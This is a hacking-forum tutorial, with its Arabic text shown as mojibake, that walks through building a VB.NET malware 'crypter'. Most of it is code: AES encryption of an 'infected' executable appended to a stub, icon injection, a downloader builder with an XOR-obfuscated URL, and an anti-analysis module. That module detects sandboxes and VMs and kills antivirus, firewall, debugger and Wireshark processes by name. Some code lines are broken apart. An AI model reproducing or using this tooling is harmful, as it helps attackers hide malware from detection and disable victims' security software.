[ , äÞÇÔ , ] , ßíÝíÉ , Úãá , ÈÑäÇãÌ , ÊÔÝíÑ , ÈÎæÇÕ , ÌÏíÏÉ , | , ÈÎæÇÑÒãíÇÊ , ÌÏíÏå , | , vb.net , | , áßá , ãÍÊÑÝí , ÇáÊÔÝíÑ , æ , ÇáÈÑãÌå
ãÑÍÈÇ Èßá ÇÚÖÇÁ æ ÒæÇÑ ãäÊÏí ÇáÏíÝ ÈæíäÊ
ÊÍíå ØíÈå æ ÈÚÏ ,,,
Çáíæã ÎØÑÊ ÈÈÇáí ÝßÑÉ æ ÇÑÌæ ÊØæíÑåÇ Ýí ãäÊÏí ÇáÊØæíÑ ÇáßÈíÑ
ßíÝíÉ Úãá
ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏå æ ÑÇÆÚå
ÈÏæä ãÇ ÇØæá Úáíßã åÇ ØÑÍ ãÇ ÊæÕáÊ Çíå
æ ÇÑíÏ ãäßã ØÑÍ ÇÝßÇÑßã ÇáÊØæíÑíå
æÇÌåå ÇáÈÑäÇãÌ ÇáãÊÚÏÏ ÇáÎæÇÕ
=================================
æÌåå ÇáÇæáí
ÚÈÇÑÉ Úä
* ÊÔÝíÑ Çí ÓíÑÝÑ + ÎÇÕíå ÊÛííÑ ÇíÞæäå |
ÇÐÇ ÇÏÑÊ ÊÛííÑåÇ
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
ÇáæÌå ÇáËÇäí
ÚÈÇÑÉ Úä ÇÖÇÝå ÎæÇÕ ÇáÊÎØí
ÇáæÌå ÇáËÇáË
ÚÈÇÑÉ Úä Úãá ÏæäáææÏÑ
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
ÇßæÇÏ ÇáÈÑäÇãÌ
ÍÊí ÇáÇä
[INFO]ãÚ ÊÛííÑ
X Úáí ÍÓÈ ÇáÑÞã Çááí ãæÌæÏ ÚäÏß Ýí ÇáãÔÑæÚ | ÇÐÇ ÒÑ Çæ ÊßÓÊ Çæ ÇáÎ ...........[/INFO]
1-Ýí ÍÏË ÖÛØ ÒÑ ÇÎÊíÇÑ ÇáÓíÑÝÑ | ÇáãáÝ ÇáÊäÝíÐí | EXE
ßæÏ:
With OpenFileDialog1
.FileName = ""
.
Filter = "Executable(*.exe)|*.exe"
.Title = "CrYpTeR V2.3 | M.Magdy DZ | HaCkEr "
.ShowDialog()
TextBox
X.Text = .FileName
infectedfile = TextBox
X.Text
End With
If OpenFileDialog
X.ShowDialog(Me) = DialogResult.OK Then
TextBox
X.Text = String.Empty
TextBox
X.Text = OpenFileDialog1.FileName
End If
áÇÎÊíÇÑ ÇáãáÝÇÊ ÇáÊäÝíÐíÉ
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
2-Ýí ÍÏË ÖÛØ ÒÑ áÇÎÊíÇÑ ÇáÇíÞæäå
ßæÏ:
Dim ooo As New OpenFileDialog
ooo.DefaultExt = "ico"
ooo.Filter = "Icon Files (*.ico*)|*.ico*"
ooo.FilterIndex = 1
ooo.FileName = ""
ooo.Title = "CrYpTeR V2.3 | M.Magdy DZ | HaCkEr OFF LiNE"
If ooo.ShowDialog(Me) = 1 Then
Me.PictureBox
X.Image = Image.FromFile(ooo.FileName)
TextBox
X.Text = ooo.FileName
End If
æ Ýí ÍÏË CheckBox
X.Checked
ßæÏ:
If CheckBoxX.Checked = True Then
TextBoxX.Enabled = True
ButtonX.Enabled = True
Else
TextBoxX.Enabled = False
ButtonX.Enabled = False
End If
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
3- ÇÖÇÝå ßáÇÓ ÌÏíÏ | áÚãáíÉ ÊÛííÑ ÇáÇíÞæäÇÊ ( áÊÓíÑ ÈÇáÔßá ÇáÕÍíÍ )
ßæÏ:
Option Strict On
Option Explicit On
Option Infer On
Imports System.Runtime.InteropServices
Imports System.Security
Public Class IconChanger
_
Private Class NativeMethods
_
Public Shared Function BeginUpdateResource( _
ByVal fileName As String, _
ByVal deleteExistingResources As Boolean) As IntPtr
End Function
_
Public Shared Function UpdateResource( _
ByVal hUpdate As IntPtr, _
ByVal type As IntPtr, _
ByVal name As IntPtr, _
ByVal language As Short, _
_
ByVal data() As Byte, _
ByVal dataSize As Integer) As Boolean
End Function
_
Public Shared Function EndUpdateResource( _
ByVal hUpdate As IntPtr, _
ByVal discard As Boolean) As Boolean
End Function
End Class
_
Private Structure ICONDIR
Public Reserved As UShort
Public Type As UShort
Public Count As UShort
End Structure
_
Private Structure ICONDIRENTRY
Public Width As Byte
Public Height As Byte
Public ColorCount As Byte
Public Reserved As Byte
Public Planes As UShort
Public BitCount As UShort
Public BytesInRes As Integer
Public ImageOffset As Integer
End Structure
_
Private Structure BITMAPINFOHEADER
Public Size As UInteger
Public Width As Integer
Public Height As Integer
Public Planes As UShort
Public BitCount As UShort
Public Compression As UInteger
Public SizeImage As UInteger
Public XPelsPerMeter As Integer
Public YPelsPerMeter As Integer
Public ClrUsed As UInteger
Public ClrImportant As UInteger
End Structure
_
Private Structure GRPICONDIRENTRY
Public Width As Byte
Public Height As Byte
Public ColorCount As Byte
Public Reserved As Byte
Public Planes As UShort
Public BitCount As UShort
Public BytesInRes As Integer
Public ID As UShort
End Structure
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String)
InjectIcon(exeFileName, iconFileName, 1, 1)
End Sub
Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String, ByVal iconGroupID As UInteger, ByVal iconBaseID As UInteger)
Const RT_ICON As UInteger = 3UI
Const RT_GROUP_ICON As UInteger = 14UI
Dim iconFile As IconFile = iconFile.FromFile(iconFileName)
Dim hUpdate = NativeMethods.BeginUpdateResource(exeFileName, False)
Dim data = iconFile.CreateIconGroupData(iconBaseID)
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_GROUP_ICON), New IntPtr(iconGroupID), 0, data, data.Length)
For i = 0 To iconFile.ImageCount - 1
Dim image = iconFile.ImageData(i)
NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_ICON), New IntPtr(iconBaseID + i), 0, image, image.Length)
Next
NativeMethods.EndUpdateResource(hUpdate, False)
End Sub
Private Class IconFile
Private iconDir As New ICONDIR
Private iconEntry() As ICONDIRENTRY
Private iconImage()() As Byte
Public ReadOnly Property ImageCount() As Integer
Get
Return iconDir.Count
End Get
End Property
Public ReadOnly Property ImageData(ByVal index As Integer) As Byte()
Get
Return iconImage(index)
End Get
End Property
Private Sub New()
End Sub
Public Shared Function FromFile(ByVal filename As String) As IconFile
Dim instance As New IconFile
Dim fileBytes() As Byte = IO.File.ReadAllBytes(filename)
Dim pinnedBytes = GCHandle.Alloc(fileBytes, GCHandleType.Pinned)
instance.iconDir = DirectCast(Marshal.PtrToStructure(pinnedBytes.Addr OfPinnedObject, GetType(ICONDIR)), ICONDIR)
instance.iconEntry = New ICONDIRENTRY(instance.iconDir.Count - 1) {}
instance.iconImage = New Byte(instance.iconDir.Count - 1)() {}
Dim offset = Marshal.SizeOf(instance.iconDir)
Dim iconDirEntryType = GetType(ICONDIRENTRY)
Dim size = Marshal.SizeOf(iconDirEntryType)
For i = 0 To instance.iconDir.Count - 1
Dim entry = DirectCast(Marshal.PtrToStructure(New IntPtr(pinnedBytes.AddrOfPinnedObject.ToInt64 + offset), iconDirEntryType), ICONDIRENTRY)
instance.iconEntry(i) = entry
instance.iconImage(i) = New Byte(entry.BytesInRes - 1) {}
Buffer.BlockCopy(fileBytes, entry.ImageOffset, instance.iconImage(i), 0, entry.BytesInRes)
offset += size
Next
pinnedBytes.Free()
Return instance
End Function
Public Function CreateIconGroupData(ByVal iconBaseID As UInteger) As Byte()
Dim sizeOfIconGroupData As Integer = Marshal.SizeOf(GetType(ICONDIR)) + Marshal.SizeOf(GetType(GRPICONDIRENTRY)) * ImageCount
Dim data(sizeOfIconGroupData - 1) As Byte
Dim pinnedData = GCHandle.Alloc(data, GCHandleType.Pinned)
Marshal.StructureToPtr(iconDir, pinnedData.AddrOfPinnedObject, False)
Dim offset = Marshal.SizeOf(iconDir)
For i = 0 To ImageCount - 1
Dim grpEntry As New GRPICONDIRENTRY
Dim bitmapheader As New BITMAPINFOHEADER
Dim pinnedBitmapInfoHeader = GCHandle.Alloc(bitmapheader, GCHandleType.Pinned)
Marshal.Copy(ImageData(i), 0, pinnedBitmapInfoHeader.AddrOfPinnedObject, Marshal.SizeOf(GetType(BITMAPINFOHEADER)))
pinnedBitmapInfoHeader.Free()
grpEntry.Width = iconEntry(i).Width
grpEntry.Height = iconEntry(i).Height
grpEntry.ColorCount = iconEntry(i).ColorCount
grpEntry.Reserved = iconEntry(i).Reserved
grpEntry.Planes = bitmapheader.Planes
grpEntry.BitCount = bitmapheader.BitCount
grpEntry.BytesInRes = iconEntry(i).BytesInRes
grpEntry.ID = CType(iconBaseID + i, UShort)
Marshal.StructureToPtr(grpEntry, New IntPtr(pinnedData.AddrOfPinnedObject.ToInt64 + offset), False)
offset += Marshal.SizeOf(GetType(GRPICONDIRENTRY))
Next
pinnedData.Free()
Return data
End Function
End Class
End Class
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
4 - ÃÖÇÝå ãæÏíá ÌÏíÏ áÇßæÇÏ ÇáÊÎØí
ßæÏ:
Imports Microsoft.Win32
Module Antis
Dim Devices As Object, Grafikadapter As String, RegionA As String = "SELECT * FROM Win32_VideoController"
Dim regPID As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microso ft\Windows NT\CurrentVersion", False)
Dim pid As Object = regPID.GetValue("ProductId")
Dim id As String = "76487-337-8429955-22614"
Public Function antiKAV() As Boolean
On Error GoTo error1
If Process.GetProcessesByName("avp").Length >= 1 Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function
Public Function antiSandboxie() As Boolean
On Error GoTo error1
If Process.GetProcessesByName("SbieSvc").Length >= 1 Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function
Public Function antiAnubis2() As Boolean
On Error GoTo error1
If pid = id Then
Return True
Else
Return False
End If
Exit Function
error1:
End
End Function
Public Function AntiVirtualBox() As Boolean
On Error GoTo error1
Call getDevices()
Select Case Grafikadapter
Case "VirtualBox Graphics Adapter"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function
Public Function AntiVmWare() As Boolean
On Error GoTo error1
Call getDevices()
Select Case Grafikadapter
Case "VMware SVGA II"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function
Public Function AntiVirtualPC() As Boolean
On Error GoTo error1
Call getDevices()
Select Case Grafikadapter
Case "VM Additions S3 Trio32/64"
Return True
Case Else
Return False
End Select
Exit Function
error1:
End
End Function
Private Sub getDevices()
On Error GoTo error1
Devices = GetObject("winmgmts:").ExecQuery(RegionA)
For Each AdaptList In Devices
Grafikadapter = AdaptList.Description
Next
Exit Sub
error1:
End
End Sub
'------------------------Keyscrambler----------------------------
Sub AntiKeyscrambler()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "keyscrambler"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'------------------------Wireshark----------------------------
Sub AntiWireshark()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "wireshark"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'----------------------------Anubis--------------------------------
Sub AntiAnubis()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "anubis"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'------------------------Malwarebytes----------------------------
Sub AntiMalwarebytes()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "mbam"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'------------------------Kaspersky----------------------------
Sub AntiKaspersky()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "avp"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'-----------------------Ollydbg---------------------------------
Sub AntiOllydbg()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "ollydbg"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'-----------------------Outpost---------------------------------
Sub AntiOutpost()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "outpost"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'-----------------------Norman------------------------------
Sub AntiNorman()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "npfmsg"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'-----------------------Bit Defender------------------------------
Sub AntiBitDefender()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "bdagent"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'-----------------------NOD32------------------------------
Sub AntiNOD32()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "egui"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
'-----------------------Zone Alarm------------------------------
Sub AntiZoneAlarm()
Dim generaldee As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To generaldee.Length - 1
Select Case Strings.LCase(generaldee(i).ProcessName)
Case "zlclient"
generaldee(i).Kill()
Case Else
End Select
Next
End Sub
End Module
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
5 - æ Ýí ÍÏË ÖÛØ ÇáÒÑ ááÊÔÝíÑ Crypt Button
ßæÏ:
Dim key As String = "3p699792sq691s854374n76841899n6p867nqr2r424770743 6n4776oo38083sn"
Dim Splitt As String = "8bda087801ee923b02ff7a5447b6c9b8416da33aed3536bc3 aad1bf463442db5"
Dim Cryptfile As String
FileOpen(1, ("stub.exe"), OpenMode.Binary)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
FileOpen(1, (TextBox
X.Text), OpenMode.Binary)
infectedfile = Space(LOF(1))
FileGet(1, infectedfile)
FileClose(1)
Cryptfile = infectedfile
Dim oAesProvider As New RijndaelManaged
Dim btClear() As Byte
Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}
Dim oKeyGenerator As New Rfc2898DeriveBytes(key, btSalt)
oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)
Dim ms As New IO.MemoryStream
Dim cs As New CryptoStream(ms, _
oAesProvider.CreateEncryptor(), _
CryptoStreamMode.Write)
btClear = System.Text.Encoding.UTF8.GetBytes(Cryptfile)
cs.Write(btClear, 0, btClear.Length)
cs.Close()
Cryptfile = Convert.ToBase64String(ms.ToArray)
FileOpen(1, (TextBox
X.Text & "-Crypted.exe"), OpenMode.Binary)
FilePut(1, stub)
FilePut(1, Splitt)
FilePut(1, Cryptfile)
FilePut(1, Splitt)
FileClose(1)
MsgBox("Error:")
MsgBox("File Crypted Succesfully", MsgBoxStyle.Information, "Success")
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
6- Ýí ÍÏË ÇáÝæÑã áææÏ
ßæÏ:
For Fadein = 0.0 To 1.1 Step 0.1
Me.Opacity = Fadein
Me.R e f r e s h()
Threading.Thread.Sleep(100)
Next
CheckBox
X.CheckState = CheckState.Indeterminate
[INFO]ãÚ ÇÒÇáå ÇáÝæÇÕá ãä ßáãå Me.R e f r e s h()[/INFO]
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
7- Ýí ÈÏÇíÉ ÝæÑã ÇáÈÑäÇãÌ
ßæÏ:
Imports System.Security.Cryptography
Imports System.IO
Imports System.Text
Imports System.Runtime.InteropServices
Imports System.CodeDom.Compiler
Public Class Form1
Dim infectedfile, stub As String
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
8- ÇÖÇÝå functions ÇáÎæÑÒãíÇÊ ÇáÊÔÝíÑíÉ
ßæÏ:
Public Shared Function StrToByteArray(ByVal str As String) As Byte()
Dim encoding As New System.Text.ASCIIEncoding()
Return encoding.GetBytes(str)
End Function
ßæÏ:
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Integer)
Function GetEOF(ByVal Path As String) As Long
Dim ByteArray() As Byte
Dim PE As Long, NumberOfSections As Integer
Dim BeginLastSection As Long
Dim RawSize As Long, RawOffset As Long
FileOpen(10, Path, OpenMode.Binary, OpenAccess.Default)
ReDim ByteArray(LOF(10) - 1)
FileGet(10, ByteArray)
FileClose(10)
Call CopyMemory(PE, ByteArray(&H3C), 4)
Call CopyMemory(NumberOfSections, ByteArray(PE + &H6), 2)
BeginLastSection = PE + &HF8 + ((NumberOfSections - 1) * &H28)
Call CopyMemory(RawSize, ByteArray(BeginLastSection + 16), 4)
Call CopyMemory(RawOffset, ByteArray(BeginLastSection + 20), 4)
GetEOF = RawSize + RawOffset
End Function
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
Ëã ÇÎíÑÇ æÇÌå Úãá ÇáÏæäáææÏÑ
ßæÏ:
Dim stub
X, text
X, text
X As String
Ýí ÍÏË ÖÛØ ÇáÒÑ áÚãá ÇáÏæäáææÏÑ
ßæÏ:
If TextBoxX.Text = "" Then
MsgBox("Oops, Looks like you forgot the URL!")
Exit Sub
End If
If TextBoxX.Text = "" Then
MsgBox("Oops, Looks like you forgot the filename!")
Exit Sub
End If
Dim i As Short
Dim KeyChar As Integer
KeyChar = Asc("++")
For i = 1 To Len(TextBoxX.Text)
text1 &= Chr(KeyChar Xor Asc(Mid(TextBoxX.Text, i, 1)))
Next
KeyChar = Asc("++")
For i = 1 To Len(TextBoxX.Text)
text2 &= Chr(KeyChar Xor Asc(Mid(TextBoxX.Text, i, 1)))
Next
Const FileSplit = "@72389@"
FileOpen(1, Application.StartupPath & "\StubX.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
If File.Exists("server.exe") Then
My.Computer.FileSystem.DeleteFile("server.exe")
End If
FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, stub & FileSplit & text1 & FileSplit & text2)
FileClose(1)
MsgBox("Server.exe file created!" + vbNewLine + "Bye Bye!")
![[ äÞÇÔ ] ßíÝíÉ Úãá ÈÑäÇãÌ ÊÔÝíÑ ÈÎæÇÕ ÌÏíÏÉ | ÈÎæÇÑÒãíÇÊ ÌÏíÏå | vb.net | áßá ãÍÊÑÝí ÇáÊÔÝíÑ æ ÇáÈÑã 58176002.gif](http://img825.imageshack.us/img825/5061/58176002.gif)
ÇäÊíåäÇ ÈÍãÏ ááå
æ ãÓÊäí ÇÝßÇÑßã ÇáÊØæíÑíå
( ÇßæÇÏ ÇáÓÊÈ | áÈÑäÇãÌ
ÇáÊÔÝíÑ | æ áÚãá ÇáÏæäáææÏÑ | ÊäÞÕäí )
ßÇä ãÚßã ÇÎæßã
M.Magdy DZ
F krha D ;dtdm ulg fvkhl[ jatdv fo,hw []d]m | fo,hv.ldhj []d]i vb>net g;g lpjvtd hgjatdv , hgfvl hgfvl[i